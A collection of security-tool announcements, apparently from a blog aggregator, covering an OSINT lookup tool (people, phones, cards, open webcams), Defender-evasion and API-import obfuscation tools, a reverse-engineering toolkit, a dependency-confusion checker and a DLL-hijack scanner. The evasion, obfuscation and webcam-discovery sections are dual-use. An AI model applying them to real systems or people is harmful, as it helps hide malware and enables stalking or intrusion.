    Command 1 will return account information of that specified Instagram & Twitter account.
  2. python3 --username johndoe
    Command 2 will return all the social media (main platforms) profiles associated with that username.
  3. python3 --username johndoe -l="john doe"
    Command 3 will repeat command 2 but instead it will also perform an in-depth google search for the "-l" argument. NOTE: When searching a query with spaces make sure you add the equal sign followed by the query in quotations. If your query does not have spaces, it will be as such: python3 --username johndoe -l query
  4. python3 --info
    Command 4 will return crucial WHOIS information about the webserver/website.
  5. python3 -r +14167777777
    Command 5 will dump information on that phone number (Carrier, Location, etc.)
  6. python3 -s apache
    Command 6 will dump all the IP address of apache servers that shodan can grab based on your API key. The query can be anything that shodan can validate.
    A sample API key is given. I recommend reading the API NOTICE below for more information.
  7. python3 -s webcamxp
    Command 7 will dump all the IP addresses and ports of open webcams on the internet that shodan can grab based on your API key. You can also just use the webcam query but webcamxp returns better results.
    A sample API key is given. I recommend reading the API NOTICE below for more information.
  8. python3 -g
    Command 8 will geolocate the specified IP address. It will return the longitude & latitude, city, state/province, country, zip/postal code region and the district.
  9. python3 -c 123456789123456
    Command 9 will retrieve information on the IIN of the credit/debit card number entered. It will also check if the card number has been leaked/pasted in a breach. Scylla will return the card brand, card scheme, card type, currency, country, and information on the bank of that IIN. NOTE: Enter the full card number if you would like to see if it was leaked. If you just want to check data on the first 6-8 digits (a.k.a. the BIN/IIN number), just input the first 6, 7, or 8 digits of the credit/debit card number. Lastly, all the information generated is public because this is an OSINT tool, and no revealing details can be generated. This prevents malicious use of this option.

usage: [-h] [-v] [-ig INSTAGRAM] [-tw TWITTER] [-u USERNAME]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         returns scyla's version
  -ig INSTAGRAM, --instagram INSTAGRAM
                        return the information associated with specified
                        instagram account
  -tw TWITTER, --twitter TWITTER
                        return the information associated with specified
                        twitter account
  -u USERNAME, --username USERNAME
                        find social media profiles (main platforms) associated
                        with given username
  --info INFO           return information about the specified website(WHOIS)
                        w/ geolocation
                        return information about the specified phone number
                        (reverse lookup)
  -l LOOKUP, --lookup LOOKUP
                        performs a google search of the 35 top items for the
                        argument given
  -s SHODAN_QUERY, --shodan_query SHODAN_QUERY
                        performs a an in-depth shodan search on any simple
                        query (i.e, 'webcamxp', 'voip', 'printer', 'apache')
  -g GEO, --geo GEO     geolocates a given IP address. provides: longitude,
                        latitude, city, country, zipcode, district, etc.
  -c CARD_INFO, --card_info CARD_INFO
                        check if the credit/debit card number has been pasted
                        in a breach...dumps sites. Also returns bank
                        information on the IIN


The API used for the reverse phone number lookup (free package) has a maximum of 250 requests. The one used in the program right now will most definitely run out of uses in the near future. If you want to keep generating API keys, go to, and select the free plan after creating an account. Then simply replace the original API key with your new API key found in your account dashboard. Insert your new key into the keys[] array (at the top of the source). The Shodan API key is just a sample key given to the program. The developer recommends creating a Shodan account and adding your own API key to the shodan_api[] array at the top of the source (

Discord Server

Ethical Notice

The developer of this program, Josh Schiavone, has written the following code for educational and OSINT purposes only. The information generated is not to be used to harm, stalk, or threaten others. Josh Schiavone is not responsible for misuse of this program. May God bless you all.

DefenderCheck - Identifies The Bytes That Microsoft Defender Flags On

3 April 2021 at 20:30
By: Zion3R

Quick tool to help make evasion work a little bit easier.

Takes a binary as input and splits it until it pinpoints the exact bytes that Microsoft Defender flags, then prints those offending bytes to the screen. This can help identify the specific bad pieces of code in your tool/payload.

Note: Defender must be enabled on your system, but the realtime protection and automatic sample submission features should be disabled.

CallObfuscator - Obfuscate Specific Windows Apis With Different APIs

28 March 2021 at 11:30
By: Zion3R

Obfuscate (hide) the PE imports from static/dynamic analysis tools.


This is pretty straightforward. Say the binary uses VirtualProtect and you want to obfuscate it with Sleep. The tool manipulates the IAT so that the thunk that pointed to VirtualProtect points to Sleep instead. When the file is executed, the Windows loader loads Sleep instead of VirtualProtect and moves execution to the entry point; from there, execution is redirected to the shellcode the tool placed earlier, which finds the address of VirtualProtect and writes it over the address of Sleep that the loader assigned.

How to use
  • It can be included directly as a library; see the following snippet (based on the example), or take a look at cli.cpp.
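#include <cobf.hpp>

int main() {
    // Open sample.exe for obfuscation.
    cobf obf_file = cobf("sample.exe");
    // Replace the kernel32 imports SetLastError with Beep and GetLastError with GetACP.
    obf_file.obf_sym("kernel32.dll", "SetLastError", "Beep");
    obf_file.obf_sym("kernel32.dll", "GetLastError", "GetACP");
    return 0;
}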
  • It can also be used as a command-line tool by supplying the input PE path, the output PE path and, optionally, the path to the configuration file (default is config.ini).
    cobf.exe <input file> <out file> [config file]
    The config file contains the obfuscations needed (DLLs, symbols, ...).
    Here is a template for the config file:
; Template for the config file:
; * Sections can be written as:
; [dll_name]
; old_sym=new_sym
; * The dll name is case insensitive, but
; the old and the new symbols are not.
; * You can use the wildcard on both the
; dll name and the old symbol.
; * You can use '#' at the start of
; the old or the new symbol to flag
; an ordinal.
; * The new symbol should be exported
; by the dll so the windows loader can resolve it.
; For example:
; * Obfuscating all of the symbols
; imported from user32.dll with ordinal 1600.
; * Obfuscating symbols imported from both
; kernel32.dll and kernelbase.dll with Sleep.
; * Obfuscating fprintf with exit.


Build this code sample

#include <windows.h>
#include <stdio.h>

int main() {
    // GetLastError returns a DWORD (unsigned long), hence %lu.
    printf("Last error is %lu\n", GetLastError());
    return 0;
}

After building it, this is what the kernel32 imports look like:

Now let's obfuscate SetLastError and GetLastError with Beep and GetACP respectively (in fact, any API exported by kernel32 would work, even one the program does not import at all).
The configuration used is:


Here is the output (you can also use the library directly, as shown above).

Again, let's look at the kernel32 imports:

SetLastError and GetLastError no longer appear in the imports.
Confirmation that both files work properly:


IDA HexRays Decompiler

IDA Debugger





That's because static analysis tools rely on the API names written in the IAT, which can be manipulated as shown.
ApiMonitor relies on IAT hooking, so the same problem applies.

On the other hand, for tools like x64dbg the displayed API names depend only on what is actually called (not on what is written in the IAT).

  • Dumping the obfuscated PE from memory won't deobfuscate it, because the manipulated IAT stays the same.
  • The main purpose of this tool is to hamper the analysis process (make it slower).
  • One can obfuscate any imported symbol (by name or by ordinal) with another symbol (by name or by ordinal).
  • The shellcode is executed as the first TLS callback, so that the obfuscated symbols needed by the other TLS callbacks are processed before the entry point is executed.
  • The shellcode is shipped as C code, generated when the tool is compiled, to make it easier to edit.
  • The obfuscated symbol names are resolved by hash, not directly by name.
  • The tool disables relocations and strips any debug symbols.
  • The tool creates a new RWX section named .cobf to hold the shellcode and other required data.
  • It can be used multiple times on the same obfuscated PE.
  • Tested only on Windows 10 x64.
  • Get source with git clone
  • Download binaries from the Release Section.

  • Shellcode obfuscation (probably with obfusion).
  • Support the delay-loaded symbols.
  • Minimize the created section size.
  • Compile time hashing.
  • Better testing.

Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R

This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit, you'll have a folder on your desktop with shortcuts to RE tools like these:

Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.

Included tools

Check the wiki.

Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.

Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.

Confused - Tool To Check For Dependency Confusion Vulnerabilities In Multiple Package Management Systems

15 March 2021 at 20:30
By: Zion3R

A tool for checking for lingering free namespaces for private package names referenced in dependency configuration for Python (pypi) requirements.txt, JavaScript (npm) package.json, PHP (composer) composer.json or MVN (maven) pom.xml.

What is this all about?

On 9 February 2021, security researcher Alex Birsan published an article describing resolution-order flaws in dependency management tools across multiple programming language ecosystems.

Microsoft released a whitepaper describing ways to mitigate the impact, while the root cause still remains.

Interpreting the tool output

confused reads an application's dependency definition file and checks the public package repositories for each dependency entry in it. It then reports every package name that is not found in the public repositories; such a package might be vulnerable to this kind of attack, although the vector has not yet been exploited.

This however doesn't mean that an application isn't already being actively exploited. If you know your software is using private package repositories, you should ensure that the namespaces for your private packages have been claimed by a trusted party (typically yourself or your company).

Known false positives

Some packaging ecosystems, like npm, have a concept called "scopes" that can be either private or public. In short, a scope is an upper-level namespace above the package name. Scopes are not inherently visible publicly, so confused cannot reliably detect whether one has been claimed. If your application uses scoped package names, you should ensure that a trusted party has claimed the scope name in the public repositories.


./confused [-l LANGUAGENAME] depfilename.ext

Usage of ./confused:
-l string
Package repository system. Possible values: "pip", "npm", "composer", "mvn" (default "npm")
-s string
Comma-separated list of known-secure namespaces. Supports wildcards
-v Verbose output


Python (PyPI)
./confused -l pip requirements.txt

Issues found, the following packages are not available in public package repositories:
[!] internal_package1

JavaScript (npm)
./confused -l npm package.json

Issues found, the following packages are not available in public package repositories:
[!] internal_package1
[!] @mycompany/internal_package1
[!] @mycompany/internal_package2

# Example when @mycompany private scope has been registered in npm, using -s
./confused -l npm -s '@mycompany/*' package.json

Issues found, the following packages are not available in public package repositories:
[!] internal_package1

Maven (mvn)
./confused -l mvn pom.xml

Issues found, the following packages are not available in public package repositories:
[!] internal
[!] internal/package1
[!] internal/_package2

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R

DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking

Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. DLLHSC implements the core functionality of the tool. The detour project generates a DLL that is used to hook APIs. The payload project generates the DLL that is used as a proof of concept to check whether the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory as DLLHSC and detour, named payload32.dll for x86 and payload64.dll for x64.

Modes of operation

The tool implements 3 modes of operation which are explained below.

Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool only places a module (DLL) in the application directory if that module is not already present in the application directory, does not belong to WinSxS and is not one of the KnownDLLs.

Upon execution, the payload DLL creates the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as proof of execution. The tool launches the application and reports whether the payload DLL was executed by checking if the temporary file exists. Because some executables import functions from the DLLs they load, error message boxes may appear when the provided DLL does not export these functions and thus does not meet the dependencies of the provided image. However, such message boxes indicate that the DLL may be a good candidate for payload execution if the dependencies are met; in this case, additional analysis is required. The title of these message boxes may contain the strings Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they appear and reports the results.

List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports modules that are loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check whether the application loads the provided module instead.

Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary or LoadLibraryEx, the tool intercepts the call and writes the requested module to the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If LoadLibraryEx is called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, nothing is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules the loader applies the normal search order).

Compile and Run Guidance

Should you choose to compile the tool from source, it is recommended to do so with Visual Studio 2019. For the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.

Help menu

The help menu for this application

dllhsc - DLL Hijack SCanner

dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait for checking any popup error windows - defaults to 10 seconds

Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop up an error box when the dependencies of the payload DLL (exported functions) are not met. By default, DLLHSC checks for 10 seconds whether a message box was opened, or for as many seconds as the user specifies with the flag -t. An error message box indicates that the module can be weaponized if its dependencies are met.

The following screenshot shows the error message box generated when OleView.exe loads the payload DLL:

The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:

The flag -lm launches the provided executable and prints the modules it loads that are neither in the KnownDLLs list nor WinSxS dependencies. This mode is meant to give an idea of DLLs that may be used as a payload, and it only exists to generate leads for the analyst.

The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.


For any feedback on this tool, please use the GitHub Issues section.